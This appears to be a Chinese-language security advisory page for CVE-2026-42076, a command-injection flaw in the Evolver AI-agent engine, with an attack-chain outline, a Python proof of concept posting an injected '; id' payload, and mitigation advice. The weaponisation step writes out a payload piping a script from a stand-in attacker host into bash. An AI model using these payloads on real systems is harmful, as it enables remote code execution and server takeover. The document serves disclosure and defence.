CVE-2026-42076 CVSS 9.8 严重

CVE-2026-42076 Evolver命令注入漏洞

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42076

漏洞类型

命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Evolver

漏洞概述

Evolver是一个基于GEP的AI代理自进化引擎。在1.69.3版本之前，其`_extractLLM()`函数存在命令注入漏洞。由于未对`corpus`参数进行适当过滤，攻击者可注入Shell元字符，利用`execSync()`执行任意系统命令，导致远程代码执行。

技术细节

该漏洞的根源在于Evolver组件中的`_extractLLM()`函数使用了不安全的编程方式。该函数在处理任务时，直接通过字符串拼接将用户可控的`corpus`参数构建成`curl`命令，并随后调用`execSync()`同步执行该命令。由于系统缺失了对输入数据的清洗或转义机制，攻击者可以在`corpus`字段中注入Shell元字符（如`;`、`|`、`&`、`$()`等）。这种注入会破坏原始命令结构，迫使服务器在执行预期操作的同时，顺带执行攻击者植入的任意恶意Shell指令，从而完全控制服务器。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标服务器正在运行Evolver服务，且版本低于1.69.3。

STEP 2

2. 武器化

攻击者构造包含Shell元字符（如`; whoami`或`; curl attacker.com/shell.sh | bash`）的恶意payload。

STEP 3

3. 投递

攻击者向Evolver的API端点发送HTTP POST请求，将恶意payload赋值给`corpus`参数。

STEP 4

4. 利用

服务器端`_extractLLM()`函数接收参数，将其拼接到curl命令中并传递给`execSync()`执行，触发任意命令执行。

STEP 5

5. 安装与行动

恶意命令在服务器上执行，攻击者获得服务器Shell权限，可进行数据窃取、安装后门或横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-42076
# The vulnerable endpoint expects a 'corpus' parameter that is passed to execSync via string concatenation.

import requests

target_url = "http://vulnerable-host/api/extract"

# Payload attempts to execute 'id' command via command injection
# Using semicolon to separate commands
malicious_payload = "http://safe-corp.com/data; id"

data = {
    "corpus": malicious_payload
}

try:
    response = requests.post(target_url, json=data)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except Exception as e:
    print(f"Error: {e}")

影响范围

Evolver < 1.69.3

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界（如WAF）部署规则，拦截对受影响接口的请求中包含常见Shell元字符（如 ;, |, &, $, `）的数据流量，并限制服务器的出站网络访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表